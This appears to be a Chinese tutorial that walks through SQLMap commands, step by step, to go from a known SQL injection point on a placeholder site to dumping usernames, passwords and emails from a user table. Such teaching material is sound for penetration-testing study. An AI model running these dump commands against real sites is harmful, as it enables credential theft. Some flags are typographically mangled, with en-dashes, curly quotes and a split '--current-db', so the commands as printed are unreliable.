SQLMap最早是在命令行下运行的工具,SQLmap提供了丰富的命令参数,使用起来极其灵活。SQLmap的命令一般都是通用的,只有极少数命令是针对个别数据库的。
已知存在注入点http://www.xxser.com/user.jsp?id=1,使用SQLmap对其提取管理员数据具体步骤如下:
1. 判断是否存在注入点:
sqlmap.py -u “http://www.xxser.com/user.jsp?id=1”
使用 -u 参数指定URL,如果URL存在注入点,将会显示出web容器,数据库版本信息。
2.获取数据库:
sqlmap.py -u “http://www.xxser.com/user.jsp?id=1” –dbs
使用 -dbs 参数读取数据库
3.查看当前应用程序所用数据库:
sqlmap.py -u “http://www.xxser.com/user.jsp?id=1” –current -db
使用–current -db参数列出当前应用程序所使用的数据库;
4 .列出指定数据库的所有表:
sqlmap.py -u “http://www.xxser.com/user.jsp?id=1” –table -D “bbs”
使用–table参数获取数据库,-D参数指定数据库;
5.读取指定表中的字段名称:
sqlmap.py -u “http://www.xxser.com/user.jsp?id=1” –columns -T “User” -D “bbs”
使用–columns参数列取字段名;
6.读取指定字段中的内容:
sqlmap.py -u “http://www.xxser.com/user.jsp?id=1” –dump -C “UserName,PassWord,Email” -T “[User]” -D “bbs”
–dump 意为转存数据,-C指定字段名称,-T指定表名(因user属于数据库关键字,所以建议加上[]),-D指定数据库名称。
通过以上六个步骤就可以轻松地对存在漏洞的URL读取数据。